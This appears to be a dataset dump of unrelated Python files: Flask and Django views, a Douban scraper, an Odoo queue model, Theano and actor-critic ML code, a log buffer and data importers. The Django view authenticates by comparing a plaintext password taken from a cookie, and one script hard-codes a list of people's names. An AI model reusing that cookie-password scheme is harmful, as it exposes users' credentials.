appconfig.update(**appyaml)\n appconfig.save()\n current_app.logger.info('App-Version created. (name=%s, version=%s)', name, version[:7])\n return {'r': 0, 'msg': 'ok'}\n\n@bp.route('//env/', methods=['PUT', ])\n@jsonify\n@check_request_json('env')\ndef set_app_env(name):\n data = request.get_json()\n env = data.pop('env')\n\n app = App.get_by_name(name)\n if not app:\n current_app.logger.error('App (name=%s) not found, env (env=%s) set ignored.', name, env)\n raise EruAbortException(consts.HTTP_BAD_REQUEST, 'App %s not found, env set ignored' % name)\n\n envconfig = app.get_resource_config(env)\n envconfig.update(**data)\n envconfig.save()\n current_app.logger.error('App (name=%s) set env (env=%s) values done', name, env)\n return {'r': 0, 'msg': 'ok'}\n\n@bp.route('//env/', methods=['GET', ])\n@jsonify\n@check_request_args('env')\ndef get_app_env(name):\n app = App.get_by_name(name)\n if not app:\n raise EruAbortException(consts.HTTP_BAD_REQUEST, 'App %s not found, env list ignored' % name)\n\n envconfig = app.get_resource_config(request.args['env'])\n return {'r': 0, 'msg': 'ok', 'data': envconfig.to_env_dict()}\n\n@bp.route('//listenv/', methods=['GET', ])\n@jsonify\ndef list_app_env(name):\n app = App.get_by_name(name)\n if not app:\n raise EruAbortException(consts.HTTP_BAD_REQUEST)\n return {'r': 0, 'msg': 'ok', 'data': app.list_resource_config()}\n\n@bp.route('//containers/', methods=['GET', ])\n@jsonify\ndef list_app_containers(name):\n app = App.get_by_name(name)\n if not app:\n raise EruAbortException(consts.HTTP_BAD_REQUEST, 'App %s not found, container list ignored' % name)\n return {'r': 0, 'msg': 'ok', 'containers': app.list_containers(g.start, g.limit)}\n\n@bp.route('//tasks/', methods=['GET', ])\n@jsonify\ndef list_app_tasks(name):\n app = App.get_by_name(name)\n if not app:\n raise EruAbortException(consts.HTTP_BAD_REQUEST, 'App %s not found, container list ignored' % name)\n return {'r': 0, 'msg': 'ok', 'tasks': app.list_tasks(g.start, g.limit)}\n\n@bp.route('//versions/', methods=['GET', ])\n@jsonify\ndef list_app_versions(name):\n app = App.get_by_name(name)\n if not app:\n raise EruAbortException(consts.HTTP_BAD_REQUEST, 'App %s not found, version list ignored' % name)\n return {'r': 0, 'msg': 'ok', 'versions': app.list_versions(g.start, g.limit)}\n\n@bp.route('///containers/', methods=['GET', ])\n@jsonify\ndef list_version_containers(name, version):\n app = App.get_by_name(name)\n if not app:\n raise EruAbortException(consts.HTTP_BAD_REQUEST, 'App %s not found, env list ignored' % name)\n v = app.get_version(version)\n if not v:\n raise EruAbortException(consts.HTTP_NOT_FOUND, 'Version %s not found' % version)\n return {'r': 0, 'msg': 'ok', 'containers': v.list_containers(g.start, g.limit)}\n\n@bp.route('///tasks/', methods=['GET', ])\n@jsonify\ndef list_version_tasks(name, version):\n app = App.get_by_name(name)\n if not app:\n raise EruAbortException(consts.HTTP_BAD_REQUEST, 'App %s not found, env list ignored' % name)\n v = app.get_version(version)\n if not v:\n raise EruAbortException(consts.HTTP_NOT_FOUND, 'Version %s not found' % version)\n return {'r': 0, 'msg': 'ok', 'tasks': v.list_tasks(g.start, g.limit)}\n","sub_path":"eru/api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"624543248","text":"import requests\nimport bs4\nimport time\n\nbaseUrl = \"https://movie.douban.com/top250\"\n\n\ndef getUrl(url):\n head = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\"\n \" (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\"\n }\n req = requests.get(url, headers=head)\n return req.text\n\n\n# dataList = [getUrl(baseUrl+\"?start=\"+str(x)) for x in range(0,250,25)] #列表生成式直接生成列表代码量少但是占用内存多,数据量大容易溢出\ndataListG = (getUrl(baseUrl + \"?start=\" + str(x)) for x in range(0, 250, 25)) # 生成器保存算法,节省内存空间,只占用一个元素的空间\n\ncount = 1\n# for i in dataList:\nfor i in dataListG:\n soup = bs4.BeautifulSoup(i,\"html.parser\")\n a = soup.findAll('div', class_='info') # 貌似有歧义class要带下划线\n for j in a:\n print(j.find(\"span\", class_=\"title\").text)\n print(count)\n count += 1\n","sub_path":"爬/douban.py","file_name":"douban.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"412721150","text":"from django.shortcuts import render_to_response,RequestContext\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom vertex.models import Vertex,Edge,Flow\nimport json\nfrom django.utils import timezone\n\n \ndef profile(request, user_id):\n\tclient = None\n\ttry:\n\t\teml = request.COOKIES[ 'email' ]\n\t\tpwd = request.COOKIES[ 'password' ]\n\t\tclient = Vertex.objects.get(email = eml)\n\t\tif client.password != pwd:\n\t\t\traise LookupError()\n\texcept:\n\t\tclient = None\n\t\t\n\ttry:\n\t\tvertex = Vertex.objects.get(user_id=user_id)\n \n\texcept :\n\t\treturn render_to_response('404error.html',\n\t\t\t{},\n\t\t\tcontext_instance=RequestContext(request))\n \n #flows = client.flow_set.order_by('-last_forward_date')[:5] \n\tme = False\n\tif client:\n\t\tif client.user_id == vertex.user_id:\n\t\t\tme = True\n\tif request.POST and client and not me:\n \n\t\ttry:\n\t\t\tnew_edge = Edge.objects.get(vertex_tail_id = client.user_id,vertex_head_id = user_id)\n\t\texcept:\n\t\t\tnew_edge = Edge(vertex_tail_id = client.user_id,vertex_head_id = user_id)\n\t\t\tnew_edge.save()\n\t\n\t\n\tif me:\n\t\treturn render_to_response('vertex.html',\n\t\t\t{\"VERTEX_DETAIL\":\"yourself\",\"VERTEX_ID\":user_id, \"FOLLOWING_VERTEX\":vertex.get_following(), \"FOLLOWER_VERTEX\":vertex.get_followers(), },\n\t\t\tcontext_instance=RequestContext(request))\n\telse:\n\t\treturn render_to_response('vertex.html',\n\t\t\t{\"VERTEX_DETAIL\":vertex.firstname+' '+vertex.lastname,\"VERTEX_ID\":user_id,\"FOLLOWING_VERTEX\":vertex.get_following() , \"FOLLOWER_VERTEX\":vertex.get_followers(), },\n\t\t\tcontext_instance=RequestContext(request))\n\t\n\treturn HttpResponse(\"You're looking at vertex %s.\" % vertex)\ndef postflow(request,user_id):\n flow_text = request.POST['flow_text']\n pub_date = timezone.now()\n newflow = Flow.objects.create(text = flow_text,pub_date = timezone.now(),last_forward_date = timezone.now(),owner = user_id)\n vertex = Vertex.objects.get(user_id = user_id)\n newflow.set_history(vertex.user_id)\n newflow.save()\n vertex.flow_set.add(newflow)\n #gotta add others too\n \n \ndef forward(request,user_id):\n flow_text = request.POST['flow_text']\n forward_to = request.POST['forward_to']\n flow = Flow.objects.get(text = flow_text)\n flow.last_forward_date = timezone.now()\n flow.save()\n vertex = Vertex.objects.get(user_id = user_id)\n if forward_to == \"all\":\n followers_list = vertex.get_followers()\n for followers in followers_list:\n followers.flow_set.add(flow)\n followers.save()\n else:\n forward_list = [] #I'll change it later with the html\n for index,followers in enumerate(forward_list):\n follower = Vertex.objects.get(user_id = followers)\n follower.flow_set.add(flow)\n follower.save()\n \n \n \n \ndef like_flow(request,liker_id):\n flow_text = request.POST['flow_text']\n flow = Flow.objects.get(text = flow_text)\n flow.like(liker_id)\n flow.save()\n \n \n# Create your views here.\n","sub_path":"vertex/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"646550352","text":"# -*- coding: utf-8 -*-\nfrom flectra import fields, models, api, _\nimport ast\nfrom datetime import datetime\nfrom flectra.tools import DEFAULT_SERVER_DATETIME_FORMAT as DTF\nimport logging\n_logger = logging.getLogger(__name__)\n\nclass ColaEnvio(models.Model):\n _name = \"sii.cola_envio\"\n\n doc_ids = fields.Char(string=\"Id Documentos\")\n model = fields.Char(string=\"Model destino\")\n user_id = fields.Many2one('res.users')\n tipo_trabajo = fields.Selection([('pasivo', 'pasivo'), ('envio', 'Envío'),('consulta', 'Consulta')], string=\"Tipo de trabajo\")\n active = fields.Boolean(string=\"Active\", default=True)\n n_atencion = fields.Char(string=\"Número atención\")\n date_time = fields.Datetime('Auto Envío al SII')\n\n def _procesar_tipo_trabajo(self):\n docs = self.env[self.model].browse(ast.literal_eval(self.doc_ids))\n if self.tipo_trabajo in [ 'pasivo' ]:\n if docs[0].sii_result not in ['', 'NoEnviado']:\n self.unlink()\n return\n if self.date_time and datetime.now() >= datetime.strptime(self.date_time, DTF):\n for d in docs:\n d.sii_result = 'EnCola'\n try:\n docs.do_dte_send()\n if docs[0].sii_send_ident:\n self.tipo_trabajo = 'consulta'\n except Exception as e:\n for d in docs:\n d.sii_result = 'NoEnviado'\n _logger.warning('Error en Envío automático')\n _logger.warning(str(e))\n return\n if docs[0].sii_send_ident and docs[0].sii_message and docs[0].sii_result in ['Proceso', 'Rechazado']:\n self.unlink()\n return\n else:\n for doc in docs :\n doc.responsable_envio = self.user_id\n if self.tipo_trabajo == 'envio' or not docs[0].sii_send_ident:\n try:\n docs.do_dte_send(self.n_atencion)\n if docs[0].sii_result not in ['', 'NoEnviado']:\n self.tipo_trabajo = 'consulta'\n except Exception as e:\n _logger.warning(\"Error en envío Cola\")\n _logger.warning(str(e))\n else:\n try:\n docs[0].ask_for_dte_status()\n except Exception as e:\n _logger.warning(\"Error en Consulta\")\n _logger.warning(str(e))\n\n @api.model\n def _cron_procesar_cola(self):\n ids = self.search([('active','=',True)])\n if ids:\n for c in ids:\n c._procesar_tipo_trabajo()\n","sub_path":"Free/l10n_cl_fe/models/sii_cola_envio.py","file_name":"sii_cola_envio.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"276203210","text":"from __future__ import print_function\n__docformat__ = 'restructedtext en'\n\nimport os\nimport sys\nimport timeit\nimport numpy\nimport theano\nimport theano.tensor as T\nfrom ann.lgrg.logistic_regression import LogisticRegression\nfrom ann.loader.mnist_loader import MnistLoader\nfrom ann.mlp.hidden_layer import HiddenLayer\n\nclass MLP(object):\n def __init__(self, rng, input, n_in, n_hidden, n_out, hW=None, hb=None, W=None, b=None):\n self.hiddenLayer = HiddenLayer(\n rng=rng,\n input=input,\n n_in=n_in,\n n_out=n_hidden,\n activation=T.tanh,\n W = hW,\n b = hb\n )\n self.logRegressionLayer = LogisticRegression(\n input=self.hiddenLayer.output,\n n_in=n_hidden,\n n_out=n_out,\n W = W,\n b = b\n )\n self.L1 = (\n abs(self.hiddenLayer.W).sum()\n + abs(self.logRegressionLayer.W).sum()\n )\n self.L2_sqr = (\n (self.hiddenLayer.W ** 2).sum()\n + (self.logRegressionLayer.W ** 2).sum()\n )\n self.negative_log_likelihood = (\n self.logRegressionLayer.negative_log_likelihood\n )\n self.errors = self.logRegressionLayer.errors\n self.params = self.hiddenLayer.params + \\\n self.logRegressionLayer.params\n self.input = input\n \n\n","sub_path":"ann/mlp/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"466519919","text":"import hashlib\nimport os\n\npath = r\"C:\\Users\\anuts\\Desktop\\审核图片\"\ndict0 = {1: '宾玉洁', 2: '陈波涌', 3: '陈雅婷', 4: '谌莹玲', 5: '邓汀', 6: '郭金花', 7: '胡娟', 8: '胡未珊', 9: '胡瑶', 10: '黄洁', 11: '黄璞', 12: '黄倩文', 13: '姜智藩', 14: '李港', 15: '李妮芝', 16: '李强', 17: '李秋慧',\n 18: '李艳桃', 19: '廖露芳', 20: '林芷仪', 21: '刘洁', 22: '', 23: '刘淇', 24: '刘诗佳', 25: '刘小静', 26: '卢玉婷', 27: '糜霞', 28: '任瑾', 29: '汤甜伊', 30: '田欢纯', 31: '王玲', 32: '王宗雄', 33: '吴德红', 34: '伍永玲',\n 35: '夏子婷', 36: '向成露', 37: '许可', 38: '鄢芳', 39: '尤鑫杰', 40: '张思琪', 41: '钟代霞', 42: '周玉金', 43: '周圆梦', 44: '黎娟', 45: '刘佩瑶', 46: '关琦月', 47: '蒋慧东', 48: '张艺凡', 49: '胡芬', 50: '袁选',\n 51: '雷文勇', 52: '李慧', 53: '陈彦宇', 54: '刘诗凤', 55: '陈柳汐'}\n#转化为int\ndef listturnint(list):\n splitparam = list.split('.', 1)\n paramstr = ''.join(splitparam[0])\n paramint = int(paramstr)\n if paramint > 55:\n # print(\"有一个值大于55,已抛异常!!\")\n return 0\n else:\n return paramint\n\n#函数���能:返回文件的md5值\ndef Remd5ValueDict(path):\n dc={}\n for root, dirs, files in os.walk(path):\n for i in files:\n file = os.path.join(root,i)\n md5 = hashlib.md5()\n md5file = open(file, 'rb')\n fd = md5file.read()\n md5.update(fd)\n dc[listturnint(i)]=md5.hexdigest()\n return dc\n\n\n#函数功能:判断文件是否重复\ndco = Remd5ValueDict(path)\ndcs = sorted(dco.items(), key=lambda d: d[1])\nprint(dcs)\n\ndef xaingtong(i, list):\n if i>> generate_log_array(['a','d'])\n ['a\\\\nd']\n >>> generate_log_array(['a', '2012', 'c'])\n ['a', '2012\\\\nc']\n '''\n log_arr = []\n last_start_line_n = 0\n for line_n, msg in enumerate(raw_msg_arr):\n if line_n > 0 and is_log_start(msg):\n msg_parts = raw_msg_arr[last_start_line_n: line_n]\n current_msg = \"\\n\".join(msg_parts)\n log_arr.append(current_msg)\n last_start_line_n = line_n\n msg_parts = raw_msg_arr[last_start_line_n:]\n last_log = \"\\n\".join(msg_parts)\n log_arr.append(last_log)\n return log_arr\n\n\nclass LogBuffer(object):\n\n def __init__(self, abs_path, max_file_size=DEFAULT_MAX_FILE_SIZE):\n self.folder, self.filename = (os.path.dirname(abs_path),\n os.path.basename(abs_path))\n self.max_file_size = max_file_size\n self.filename_regex = \\\n re.compile(FILENAME_REGEX_PATTERN % self.filename)\n self.handle_lock = threading.RLock()\n\n @property\n def current_log_file(self):\n abs_path = os.path.join(self.folder, self.filename)\n ensure_path(abs_path)\n return abs_path\n\n def _get_oldest_index(self):\n '''\n The smallest number is the oldest.\n When no file with suffix exists, return 0\n '''\n filenames = os.listdir(self.folder)\n indexes = [int(self.match(fn).group(1))\n for fn in filenames if self.filename_regex.match(fn)]\n if not indexes:\n # no file exists except file\n return 0\n return min(indexes)\n\n @property\n def oldest_group_file(self):\n index = self._get_oldest_index()\n fn = \"%s.%s\" % (self.filename, index) \\\n if index != 0 else self.filename\n abs_path = os.path.join(self.folder, fn)\n return abs_path\n\n def _get_oldest_group(self):\n with open(self.oldest_group_file, 'r') as f:\n raw_lines = [line.strip() for line in f.readlines() if line]\n group = generate_log_array(raw_lines)\n return group\n\n def _rewrite_oldest_group(self, new_group):\n content = \"\\n\".join(new_group)\n with open(self.oldest_group_file, 'w') as f:\n f.write(content)\n\n def _delete_oldest_group(self):\n os.remove(self.oldest_group_file)\n\n def _generate_next_filename(self):\n last_index = self._get_oldest_index()\n new_index = last_index + 1\n return \"%s.%s\" % (self.filename, new_index)\n\n def has_log(self):\n if self._get_oldest_index() > 0:\n return True\n else:\n # allow for a return, it's a little arbitrary.\n return True if file_size(self.current_log_file) > 1 \\\n else False\n\n def add_log(self, msg):\n '''\n Interface to write log.\n '''\n with self.handle_lock:\n if file_size(self.current_log_file) + len(msg) \\\n > self.max_file_size:\n new_backup_filename = self._generate_next_filename()\n shutil.move(self.current_log_file,\n os.path.join(self.folder, new_backup_filename))\n with open(self.current_log_file, 'a') as f:\n f.write(\"%s\\n\" % msg)\n\n def clean_oldest_group(self, retry_func):\n '''\n Interface to clean buffer.\n '''\n with self.handle_lock:\n oldest_group = self._get_oldest_group()\n for log in oldest_group:\n if retry_func(log):\n oldest_group.remove(log)\n if oldest_group:\n self._rewrite_oldest_group(oldest_group)\n else:\n self._delete_oldest_group()\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","sub_path":"qfpay_scribe_logger/logbuffer.py","file_name":"logbuffer.py","file_ext":"py","file_size_in_byte":4151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"359571965","text":"#!/usr/bin/env python\n\nimport gym\nfrom gym import wrappers\nimport gym_gazebo\nimport time\nfrom distutils.dir_util import copy_tree\nimport os\nimport json\nimport liveplot\nimport ac_actorcritic as ac\nimport csv\nimport numpy as np\nimport tensorflow.compat.v1 as tf\nimport random\nimport ac_memory as memory\nimport pandas as pd\n\n#for xrange\nfrom past.builtins import xrange\n\ndef detect_monitor_files(training_dir):\n return [os.path.join(training_dir, f) for f in os.listdir(training_dir) if f.startswith('openaigym')]\n\ndef clear_monitor_files(training_dir):\n files = detect_monitor_files(training_dir)\n if len(files) == 0:\n return\n for file in files:\n print(file)\n os.unlink(file)\n\nif __name__ == '__main__': \n\t#REMEMBER!: project_setup.bash must be executed.\n env = gym.make('GazeboProjectTurtlebotAc-v0')\n action_dim = env.action_space.shape[0]\n observation_dim = env.observation_space.shape\n \n main_outdir = '/home/katolab/experiment_data/AC_data_2/'\n outdir = main_outdir + 'gazebo_gym_experiments/'\n path = main_outdir + 'project_ac_ep'\n \n continue_execution = False\n \n #fill this if continue_execution=True\n resume_epoch = '1900' # change to epoch to continue from\n resume_path = path + resume_epoch\n actor_weights_path = resume_path + '_actor.h5'\n actor_target_weights_path = resume_path + '_actor_target.h5'\n critic_weights_path = resume_path + '_critic.h5'\n critic_target_weights_path = resume_path + '_critic_target.h5'\n params_json = resume_path + '.json'\n \n if not continue_execution:\n #Each time we take a sample and update our weights it is called a mini-batch.\n #Each time we run through the entire dataset, it's called an epoch.\n #PARAMETER LIST\n EPISODES = 5000\n STEPS = 50\n UPDATE_NETWORK = 1 # once per number of actions\n MINIBATCH_SIZE = 128\n MINIMUM_REPLAY_MEMORY = 1000\n A_LEARNING_RATE = 0.0001\n C_LEARNING_RATE = 0.0003\n GREEDY_BOOL = False\n GREEDY_RATE = 1\n REWARD_SCALE = 0.1\n DISCOUNT_FACTOR = 0.99\n MEMORY_SIZE = 250000\n A_HIDDEN_LAYER = [512,512,512]\n C_HIDDEN_LAYER = [[],[],[512,512,512]] # [[before merging critic],[before merging actor],[after merging]]\n CURRENT_EPISODE = 0\n TARGET_DISCOUNT = 0.001 # [0,1] 0: don't update target weights, 1: update target wieghts 100% from model weights\n MEMORIES = None\n\n else:\n #Load weights, monitor info and parameter info.\n with open(params_json) as outfile:\n d = json.load(outfile)\n EPISODES = d.get('EPISODES')\n STEPS = d.get('STEPS')\n UPDATE_NETWORK = d.get('UPDATE_NETWORK')\n MINIBATCH_SIZE = d.get('MINIBATCH_SIZE')\n MINIMUM_REPLAY_MEMORY = d.get('MINIMUM_REPLAY_MEMORY')\n A_LEARNING_RATE = d.get('A_LEARNING_RATE')\n C_LEARNING_RATE = d.get('C_LEARNING_RATE')\n GREEDY_BOOL = d.get('GREEDY_BOOL')\n GREEDY_RATE = d.get('GREEDY_RATE')\n REWARD_SCALE = d.get('REWARD_SCALE')\n DISCOUNT_FACTOR = d.get('DISCOUNT_FACTOR')\n MEMORY_SIZE = d.get('MEMORY_SIZE')\n A_HIDDEN_LAYER = d.get('A_HIDDEN_LAYER')\n C_HIDDEN_LAYER = d.get('C_HIDDEN_LAYER')\n CURRENT_EPISODE = d.get('CURRENT_EPISODE')\n TARGET_DISCOUNT = d.get('TARGET_DISCOUNT')\n MEMORIES = pd.read_csv(main_outdir + 'experience.csv', index_col=0, dtype = {'reward':np.float64, 'done':np.float32})\n \n clear_monitor_files(outdir)\n \n # Initialize Tensorflow session\n sess = tf.Session()\n \n # Actor model to take actions \n # state -> action\n actor = ac.Actor(sess, action_dim, observation_dim, A_LEARNING_RATE, A_HIDDEN_LAYER)\n # Critic model to evaluate the action taken by the actor\n # state + action -> Expected reward to be achieved by taking action in the state.\n critic = ac.Critic(sess, action_dim, observation_dim, C_LEARNING_RATE, C_HIDDEN_LAYER)\n \n # Initialize saver to save session's variables\n saver = tf.train.Saver()\n if not continue_execution: \n os.makedirs(outdir)\n sess.run(tf.initialize_all_variables())\n else:\n saver.restore(sess, main_outdir + 'project_ac_session_var-' + resume_epoch)\n plotter = liveplot.LivePlot(outdir)\n\n actor_critic = ac.ActorCritic(env, actor, critic, DISCOUNT_FACTOR, MINIBATCH_SIZE, MEMORY_SIZE, TARGET_DISCOUNT, continue_execution, MEMORIES)\n \n if continue_execution : actor_critic.loadModels(actor_weights_path, critic_weights_path, actor_target_weights_path, critic_target_weights_path)\n \n env._max_episode_steps = STEPS # env returns done after _max_episode_steps\n env = gym.wrappers.Monitor(env, outdir,force=not continue_execution, resume=continue_execution)\n\n stepCounter = 0\n min_distance = 20\n max_reward = 0\n \n start_time = time.time()\n \n env.set_start_mode(\"random\") #\"random\" or \"static\" \n \n states = []\n actions = []\n def make_state(states, actions, state, action):\n # update states and actions\n states.pop(0)\n actions.pop(0)\n states.append(state)\n actions.append(action)\n \n # merge past state and action\n _state = []\n for i in range(len(states)-1):\n _state += list(states[i]) + list(actions[i])\n _state += list(states[len(states)-1])\n return states, actions, np.asarray(tuple(_state)) \n \n #start iterating from 'current epoch'\n for episode in xrange(CURRENT_EPISODE+1, EPISODES+1, 1):\n done = False\n \n first_state = env.reset()\n first_action = np.array([0,0,0])\n states = [first_state, first_state, first_state]\n actions = [first_action, first_action]\n states, actions, cur_state = make_state(states, actions, first_state, first_action)\n \n action_memory = memory.Memory(STEPS)\n episode_reward = 0\n episode_step = 0\n new_episode = True\n while not done:\n action, action_step = actor_critic.act(cur_state, new_episode, GREEDY_RATE)\n _next_state, reward, done, _ = env.step(action_step)\n \n states, actions, next_state = make_state(states, actions, _next_state, action)\n\n episode_reward += reward\n\n # Add experience to replay memory\n actor_critic.replay_memory.addMemory(cur_state, action, reward*REWARD_SCALE, next_state, done)\n action_memory.addMemory(cur_state, action, reward, next_state, done)\n\n cur_state = next_state\n \n episode_step += 1\n stepCounter += 1\n\n if len(actor_critic.replay_memory.exp.index) >= MINIMUM_REPLAY_MEMORY:\n actor_critic.train('random')\n if episode%UPDATE_NETWORK == 0: actor_critic.updateTarget()\n \n new_episode = done\n \n if (len(actor_critic.replay_memory.exp.index) >= MINIMUM_REPLAY_MEMORY) and episode%UPDATE_NETWORK == 0: actor_critic.updateTarget()\n \n resetVel = False\n while not resetVel:\n try:\n env.reset_vel()\n resetVel = True\n except:\n pass\n \n m, s = divmod(int(time.time() - start_time), 60)\n h, m = divmod(m, 60)\n \n if env.subgoal_as_dist_to_goal < min_distance:\n min_distance = env.subgoal_as_dist_to_goal\n action_memory.exp.to_csv(outdir + 'min_distance.csv')\n if max_reward < episode_reward:\n max_reward = episode_reward\n action_memory.exp.to_csv(outdir + 'max_reward.csv')\n \n print(\"EP:\" + str(episode) + \" - \" + str(episode_step) + \"/\" + str(STEPS) + \" steps |\" + \" R: \" + str(episode_reward) + \" | Dist: \" + str(env.subgoal_as_dist_to_goal) + \" | Max R: \" + str(max_reward) + \" | Min Dist: \" + str(min_distance) + \"| Time: %d:%02d:%02d\" % (h, m, s))\n \n if (episode)%100==0: \n #save model weights and monitoring data every 100 epochs.\n actor_critic.saveModel(path+str(episode)+'_actor.h5', path+str(episode)+'_critic.h5', path+str(episode)+'_actor_target.h5', path+str(episode)+'_critic_target.h5')\n env._flush()\n \n #save simulation parameters.\n parameter_keys = ['EPISODES', 'STEPS', 'UPDATE_NETWORK', 'MINIBATCH_SIZE', 'MINIMUM_REPLAY_MEMORY', 'A_LEARNING_RATE', 'C_LEARNING_RATE', 'GREEDY_BOOL', 'GREEDY_RATE', 'REWARD_SCALE', 'DISCOUNT_FACTOR', 'MEMORY_SIZE', 'A_HIDDEN_LAYER', 'C_HIDDEN_LAYER', 'CURRENT_EPISODE', 'TARGET_DISCOUNT']\n parameter_values = [EPISODES, STEPS, UPDATE_NETWORK, MINIBATCH_SIZE, MINIMUM_REPLAY_MEMORY, A_LEARNING_RATE, C_LEARNING_RATE, GREEDY_BOOL, GREEDY_RATE, REWARD_SCALE, DISCOUNT_FACTOR, MEMORY_SIZE, A_HIDDEN_LAYER, C_HIDDEN_LAYER, episode, TARGET_DISCOUNT]\n parameter_dictionary = dict(zip(parameter_keys, parameter_values))\n with open(path+str(episode)+'.json', 'w') as outfile:\n json.dump(parameter_dictionary, outfile)\n \n # Save experiences data\n actor_critic.replay_memory.exp.to_csv(main_outdir + 'experience.csv')\n \n # Show rewards graph\n plotter.plot(env, outdir)\n \n # Save tf.session variables\n saver.save(sess, main_outdir + 'project_ac_session_var', global_step=episode)\n \n # Greedy rate update\n if GREEDY_BOOL: GREEDY_RATE = max(0.05, GREEDY_RATE*0.9987) # 3000eps: 0.9987, 1000eps: 0.997\n \n # Save rewards\n with open(main_outdir + 'reward_ac.csv','a+') as csvRWRD:\n csvRWRD_writer = csv.writer(csvRWRD,dialect='excel')\n csvRWRD_writer.writerow([episode, episode_step, episode_reward, env.subgoal_as_dist_to_goal])\n csvRWRD.close()\n \n env.close()\n\n\n","sub_path":"ac_main_2.py","file_name":"ac_main_2.py","file_ext":"py","file_size_in_byte":10036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"601241285","text":"'''\nPurpose:\n 1. 读取TrustData每个月Excel报表,导入数据库\nAuthor: Patrick Zhang(Patrick.zhang@bda.com)\nHistory:\n 2016.04.08 Patrick Zhang write comments in this format\n'''\nimport openpyxl\nimport warnings\nimport calendar\nfrom datetime import date, datetime\nfrom helpers.utils import upsert_batch\n\nwarnings.filterwarnings(\"ignore\")\n\nTODAY = date.today()\ndays_num = 0\n\nFLAGS = [\n 'Monthly Active Users (mln)', 'Daily Active Users (mln)',\n 'Daily Startups per User (#)', 'Daily Time Spent per User (Min)']\n\ndef read_excel(fpath, target_date):\n global days_num\n a_date = datetime.strptime(target_date, '%Y-%m-%d').date()\n days_num = calendar.monthrange(a_date.year, a_date.month)[1]\n\n # 使用Readonly读取会很快\n wb = openpyxl.load_workbook(filename=fpath, read_only=True, data_only=True)\n\n for ws in wb:\n title = ws.title.strip()\n # 当前处于什么位置\n # 0: mau, 1: dau, 2: startups, 3: time\n flag = None\n # 结果集\n result_dict = {}\n # 遍历每一行\n for row_index, row in enumerate(ws.rows):\n # 跳过前两行, 跳过空白行\n if row_index <= 1 \\\n or (row[0].value is None and row[1].value is None):\n continue\n # 设置Flag\n if row[1].value and str(row[1].value).strip() in FLAGS:\n flag = FLAGS.index(row[1].value.strip())\n if row_index != 2:\n continue\n elif 'MoM change' in str(row[1].value):\n flag = None\n continue\n elif flag is None:\n continue\n # 第三行,找日期所在列\n if row_index == 2:\n for column_index, cell in enumerate(row):\n if str(cell.value).split(' ')[0] == target_date:\n print('目标数据在%s列' % column_index)\n break\n continue\n # 开始收集数据\n print(flag, row[2].value, row[column_index].value)\n app_name_en, app_name, value = str(row[1].value).strip(), str(row[2].value).strip(), row[column_index].value\n # 初始化结果集\n if app_name in result_dict:\n result_dict[app_name][flag] = value\n else:\n result_dict[app_name] = [0] * 4\n result_dict[app_name].extend([app_name_en, target_date, title])\n result_dict[app_name][flag] = value\n\n if result_dict:\n print(result_dict)\n wrap(result_dict)\n\ndef wrap(result_dict):\n # 先处理从Excel读取的记录,然后导入数据库\n insert_list = []\n for app_name, value_list in result_dict.items():\n # 单位千\n mau = value_list[0] * 1000\n dau = value_list[1] * 1000\n # 单位次,分钟\n per_capita_daily_startup_counts, per_capita_daily_use_time, app_name_en, target_date, sector = value_list[2:]\n\n per_startup_use_time = per_capita_daily_use_time / per_capita_daily_startup_counts\n total_startup_counts = dau * per_capita_daily_startup_counts * days_num\n total_use_time = (per_startup_use_time * total_startup_counts) / 60\n\n insert_list.append([\n app_name, app_name_en, sector, target_date, dau, per_capita_daily_startup_counts, per_startup_use_time,\n mau, per_capita_daily_use_time, total_startup_counts, total_use_time, 'TrustData', str(TODAY),\n '30', 'Mobile', 'APP', 'iOS + Android'])\n\n sql = (\n 'INSERT INTO app(app_name, app_name_en, sector, starting_date, daily_active_user, per_capita_daily_startup_counts, '\n ' per_startup_use_time, active_users, per_capita_daily_use_time, total_startup_counts , total_use_time,'\n ' source, createddate, date_type, app_type, data_type, os) '\n ' VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)')\n\n upsert_batch(sql, insert_list)\n\n\nif __name__ == '__main__':\n read_excel(\n 'D:/BDA_Files/Original Data/local/TrustData/20160408/Trustdata数据报表-tiger-2016 04 05.xlsx',\n '2016-03-01')\n","sub_path":"handler/trustdata_excel_import.py","file_name":"trustdata_excel_import.py","file_ext":"py","file_size_in_byte":4165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"569353614","text":"#!/usr/bin/env python\n# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\n\"\"\"\nOne-off script to fix residual mismatches in cmd_states pitch and SIM-Z. These\nare largely due to SCS107 runs with a dense set of replans that are not exactly\ncaptured in the timeline loads.\n\nThis script uses telemetry to repair the errant command states. The result is still\nnot perfect but mostly good. The last fix is 2007:153.\n\n# Fetch comparison telemetry\nfetch --start 2002:010 --stop 2009:001:00:00:00 --dt 600 --outfile tlm2002_2008.dat \\\n --time-format secs aopcadmd cobsrqid tscpos aosares1 point_suncentang\n\n\"\"\"\n\n# import Ska.Table\nimport Ska.DBI\nimport Chandra.cmd_states as cmd_states\n\ndef get_options():\n from optparse import OptionParser\n parser = OptionParser()\n parser.set_defaults()\n parser.add_option(\"--dbi\",\n default='sqlite',\n help=\"Database interface (sqlite|sybase)\")\n parser.add_option(\"--server\",\n default='db_base.db3',\n 